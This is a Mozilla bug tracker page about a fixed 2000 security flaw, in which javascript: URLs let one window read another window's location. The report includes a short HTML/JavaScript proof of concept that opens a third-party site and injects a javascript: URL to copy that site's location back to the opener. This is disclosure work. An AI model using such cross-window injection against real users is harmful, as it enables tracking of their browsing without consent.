Closed Bug 38178 Opened 26 years ago Closed 26 years ago

javascript: URLs allow tracking user's browsing

Categories

(Core :: Security, defect, P3)

defect

Tracking

()

VERIFIED FIXED

People

(Reporter: security-bugs, Assigned: security-bugs)

Details

Attachments

(1 file)

Subject: BUG: javascript: URLs allow tracking user's browsing Date: Wed, 03 May 2000 17:29:33 +0300 From: Georgi Guninski <joro@nat.bg> To: Norris Boyd <norris@netscape.com> There is a bug in javascript: urls and/or window.location which allow tracking user's browsing. The code is: ------------------------------------------- <SCRIPT> a=window.open("http://www.yahoo.com"); </SCRIPT> <A HREF="javascript:a.location='javascript:opener.loc= window.location;void(0)';setTimeout('alert(window.loc);',1000);void(0);">Click here to see the location of the other window</A> </HTML> -------------------------------------------
Problems with the trust boundary for javscript: URLs. Marking M17.
Status: NEW → ASSIGNED
Target Milestone: --- → M17
Assigning QA to czhang
QA Contact: junruh → czhang
Fixed with JS URL patch. Marking Fixed, but let's watch this one for regressions. As with many of these bugs, fixing bug 28443, the safe default for DOM properties, will provide an extra measure of confidence about this bug.
Status: ASSIGNED → RESOLVED
Closed: 26 years ago
Resolution: --- → FIXED
verified.
Status: RESOLVED → VERIFIED
Opening fixed security bugs to the public.
Group: netscapeconfidential?
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Created:
Updated:
Size: